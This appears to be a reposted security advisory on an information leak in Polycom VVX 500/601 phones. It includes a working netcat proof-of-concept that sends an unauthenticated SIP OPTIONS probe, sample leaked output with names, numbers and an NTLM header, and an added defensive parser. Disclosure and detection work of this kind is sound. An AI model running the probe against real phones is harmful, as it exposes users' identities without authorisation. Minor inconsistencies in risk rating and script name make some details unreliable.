Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

Author:     Micha Borrmann
Risk:       Security Risk Medium
0day-ID:    0day-ID-31416
Category:   local exploits
Date added: 25-10-2018
CVE:        CVE-2018-18566
Platform:   hardware

Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        Information Exposure (CWE-200)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:             CVE-2018-18566
Authors of Advisory:       Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premises Skype for
Business installation, the phone leaks the configured phone number
and name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

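#!/bin/sh
# Micha Borrmann <micha.borrmann@syss.de>

# IPv4 address of the host running this script (used in the Via and To headers)
OWNIP=192.168.100.102

if [ -z "$1" ]
then
    echo "Please enter an IPv4 address as target"
    exit 1
else
    TARGET=$1
fi

# Send one unauthenticated SIP OPTIONS request to TCP port 5060.
# recode converts the LF line endings to the CRLF that SIP requires.
echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 "$TARGET" 5060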

Run the script against a phone and observe the response:

$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0
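
Added example, not part of the SySS advisory or its PoC: a check that a defender can run over a captured SIP response (for instance one taken from a packet capture) to list the identity data shown in the output above. The function names, the header set (including the RFC 3261 compact forms "t" and "m") and the embedded sample, a shortened copy of the PoC response, are assumptions of this example.

```python
import re

# Headers that carried user identity in the PoC output, plus the RFC 3261
# compact forms of To ("t") and Contact ("m"); this set is an assumption.
IDENTITY_HEADERS = {"to", "t", "contact", "m", "p-preferred-identity"}

# Constructed sample: a shortened copy of the advisory's PoC response.
SAMPLE = "\r\n".join([
    'SIP/2.0 200 OK',
    'Via: SIP/2.0/TCP 192.168.100.102:5060',
    'To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE',
    'Contact: <sip:micha.borrmann@example.com;opaque=user:epid:XYZ...;abcd>',
    'User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848',
    'P-Preferred-Identity: "Micha Borrmann" <sip:micha.borrmann@example.com>,'
    '<tel:+49XYZ334455661234;ext=1234>',
    'Content-Length: 0', '', ''])


def parse_headers(raw):
    """Return (start_line, [(lowercased name, value), ...]) of one SIP message."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and headers:   # folded continuation line
            headers[-1] = (headers[-1][0], headers[-1][1] + " " + line.strip())
        elif ":" in line:
            name, value = line.split(":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def identity_exposure(raw):
    """List the user-identifying values found in a SIP response."""
    start, headers = parse_headers(raw)
    names, users, numbers, agent = set(), set(), set(), None
    if start.startswith("SIP/2.0 "):              # responses only, not requests
        for name, value in headers:
            if name in IDENTITY_HEADERS:
                names.update(re.findall(r'"([^"]+)"\s*<', value))
                users.update(re.findall(r'<sips?:([^@;>\s]+@[^;>\s]+)', value))
                numbers.update(re.findall(r'<tel:([^;>\s]+)', value))
            elif name == "user-agent":
                agent = value
    return {"display_names": sorted(names), "sip_users": sorted(users),
            "tel_numbers": sorted(numbers), "user_agent": agent}


if __name__ == "__main__":
    print(identity_exposure(SAMPLE))
```

A response whose To and Contact headers carry only an IP address, with no display name or user part, yields empty lists.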

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware, in which the SIP service is disabled by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/
